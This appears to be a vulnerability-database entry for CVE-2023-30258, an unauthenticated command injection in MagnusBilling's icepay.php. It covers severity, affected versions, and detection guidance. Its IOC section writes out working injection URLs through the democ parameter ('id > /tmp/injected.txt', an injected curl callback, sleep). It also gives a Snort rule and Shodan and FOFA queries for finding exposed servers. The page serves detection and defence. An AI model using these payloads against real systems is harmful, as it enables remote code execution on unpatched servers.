cbcvebase.
CVE-2023-30258
published 2023-06-23

CVE-2023-30258: Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
94.25%
99.8th percentile
Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

Affected

1 ranges
VendorProductVersion rangeFixed in
magnussolutionmagnusbilling6.0.0 – 7.3.0

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
path/mbilling/lib/icepay/icepay.php
url{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
url{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS MagnusBilling icepay.php democ Parameter Command Inject Attempt (CVE-2023-30258)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/mbilling/lib/icepay/icepay.php?democ|3d|"; fast_pattern; startswith; content:"|3b|"; within:100; content:"|3b 23|"; within:500; reference:url,attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258; reference:cve,2023-30258; classtype:attempted-admin; sid:2049247; rev:2; metadata:affected_product Linux, attack_target Networking_Equipment, created_at 2023_11_16, cve CVE_2023_30258, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_08, reviewed_at 2024_10_02; target:dest_ip;)
  • The vulnerable parameter is `democ` in a GET request to `/mbilling/lib/icepay/icepay.php`. The value is passed unsanitised to PHP's `exec()`. Injection is indicated by a semicolon (`;`, URL-encoded `%3b`) in the parameter value, typically terminated with `#` (`%23`) to comment out trailing content.
  • Exploitation requires no authentication. Look for GET requests to `icepay.php` from unauthenticated sessions (no session cookie / no prior login flow) containing shell metacharacters in the `democ` parameter.
  • Commands execute as the web server process user. Post-exploitation artefacts to hunt for include files written to `/tmp/` (e.g. `/tmp/injected.txt`) and outbound `curl` or `sleep` child processes spawned by the web server.
  • For OOB/blind detection, monitor for DNS/HTTP callbacks from the MagnusBilling server to external hosts triggered by injected `curl` commands. The Nuclei template confirms exploitation via `User-Agent: curl` in the interactsh callback request.
  • Shodan/FOFA fingerprinting: exposed MagnusBilling instances can be identified with `http.html:"magnusbilling"` (Shodan) or `body="magnusbilling"` (FOFA) to scope detection to relevant assets.
  • The Emerging Threats Snort rule (SID 2049247) uses byte-pattern matching: URI must start with `/mbilling/lib/icepay/icepay.php?democ=` (`|3d|`), contain `;` (`|3b|`) within 100 bytes, and contain `;#` (`|3b 23|`) within 500 bytes of that.
  • ·Both MagnusBilling 6.x (all versions) and 7.x up to (but not including) the commit that fixes the vulnerability are affected. Version 7.x instances patched with commit `7af21ed620` are not vulnerable.
  • ·The vulnerable file is demonstration/PoC code (`lib/icepay/icepay.php`) that should not be present in production deployments. Its presence on an internet-facing server is itself a misconfiguration risk independent of patching.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.